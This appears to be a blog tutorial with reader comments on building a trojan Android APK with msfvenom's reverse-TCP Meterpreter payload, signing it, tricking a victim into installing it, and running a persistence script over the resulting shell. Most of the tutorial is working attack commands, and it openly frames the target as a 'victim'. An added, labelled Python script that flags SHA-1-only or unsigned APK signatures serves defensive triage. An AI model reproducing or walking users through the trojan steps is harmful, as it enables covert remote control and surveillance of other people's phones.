1. Open a terminal.
2. Generate the APK by typing:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Port to Listen> R > /root/Desktop/<anything>.apk
(replace LHOST with your own IP)
3. Now we must generate a keystore and sign our APK, because if we don't, some devices or some versions of Android will require the app to be signed.
4. For Generating the Keystore:
keytool -genkey -v -keystore /root/Desktop/my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
5. Enter a six-digit password and remember it.
6. Fill in all the details and answer Yes to the last question. The keystore will be created. You will be asked for the password again.
7. Now we have to sign the APK file using this keystore. To do this, type:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name
When it asks for the passphrase, enter the password you entered earlier.
8. Load metasploit console, by typing:
msfconsole
9. After it loads (it will take time), load the multi-handler exploit by typing:
use exploit/multi/handler
10. Set up a (reverse) payload by typing:
set payload android/meterpreter/reverse_tcp
11. To set LHOST, type:
set LHOST <Your IP>
Note: Even if you are hacking on WAN, type your private/internal IP here, not the public/external one.
13. Copy the application that you made (Anything.apk) from the root folder to your Android phone.
14. Then send the APK file to the phone you want to hack.
15. Let the victim install the app.
Note: The option to allow installation of apps from Unknown Sources must be enabled (if it is not already) in the security settings of the Android phone for the Trojan to install.
16. When the victim taps Open, the Meterpreter prompt appears.
17. Download Persistent.sh.
18. Upload the file to the device in /sdcard/Download.
19. Run cd / (to go to the root directory), then navigate to /sdcard/Download/ using cd.
20. To upload the file, use the command:
upload /root/Desktop/Persistent.sh
(In the screenshots, anything.sh is actually Persistent.sh.)
21. Now all we must do is execute the script once; everything else is done by the script automatically.
22. Drop into the system's shell by typing:
shell
23. Now navigate to the location of the script:
cd /
cd /sdcard/Download
ls
24. Now it is time for execution. Type:
sh Persistent.sh
Things to remember:
The persistence of the backdoor will only remain until the Android system is rebooted.
If you are hacking on WAN and you have a dynamic public IP, then the persistence will only remain until your router reboots or your IP changes.
Remember to reboot the Android device to eliminate the running script if you are testing on your own Android system.
If the victim's Android system is rooted and your public IP is static, then:
1) The persistence will remain forever on WAN!
2) The persistence will remain forever on LAN, obviously.
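As an added, defender-side example that is not part of the original tutorial: the jarsigner invocation above (-sigalg SHA1withRSA -digestalg SHA1) writes SHA1-Digest attributes into META-INF/MANIFEST.MF, so a review script run over APKs found on a device can flag apps that are unsigned or carry only that SHA-1 v1 signature. The sample APKs are constructed in memory, and the signer file names are assumptions.

```python
"""Triage an APK's JAR (v1) signature metadata using only the standard library.

Added example, not code from the original post. Flags APKs that are unsigned or
whose v1 signature uses SHA-1 digests, as produced by
  jarsigner -sigalg SHA1withRSA -digestalg SHA1 ...
The APKs inspected here are constructed sample data, not real apps.
"""
import io
import re
import zipfile

# Signature block files written by jarsigner live under META-INF/ with these suffixes.
SIG_BLOCK = re.compile(r"^META-INF/[^/]+\.(RSA|DSA|EC)$")


def triage_apk(data: bytes) -> dict:
    """Return signature facts about the APK bytes: signed?, digest algorithms used, signer files."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        blocks = [n for n in names if SIG_BLOCK.match(n)]
        digests = set()
        if "META-INF/MANIFEST.MF" in names:
            manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            # Attributes look like "SHA1-Digest: ..." or "SHA-256-Digest: ..."
            digests = set(re.findall(r"^([A-Za-z0-9-]+)-Digest:", manifest, re.M))
    signed = bool(blocks) and "META-INF/MANIFEST.MF" in names
    return {
        "signed": signed,
        "signature_blocks": blocks,
        "digest_algorithms": sorted(digests),
        "sha1_only": signed and digests == {"SHA1"},  # the tutorial's jarsigner flags
    }


def build_sample(sha1_signed: bool) -> bytes:
    """Construct an in-memory APK skeleton (constructed sample data, not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"dex\n035\x00")
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")
        if sha1_signed:
            z.writestr("META-INF/MANIFEST.MF",
                       "Manifest-Version: 1.0\r\n\r\nName: classes.dex\r\nSHA1-Digest: AAAA\r\n")
            z.writestr("META-INF/ALIAS_NA.SF", "Signature-Version: 1.0\r\n")  # assumed name
            z.writestr("META-INF/ALIAS_NA.RSA", b"\x30\x82")  # placeholder PKCS#7 bytes
    return buf.getvalue()
```

Pointing triage_apk at the bytes of a real APK pulled from a test device reports the same three facts; an unsigned result or a SHA-1-only signature on a sideloaded app is a reason to look closer.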
Video Tutorial:
Can this only be used for linux? Kali sounds very useful and easy to use but I don’t have a linux device. Thanks for posting about it though.
I read this article. I think you put a lot of effort into creating this article. I appreciate your work.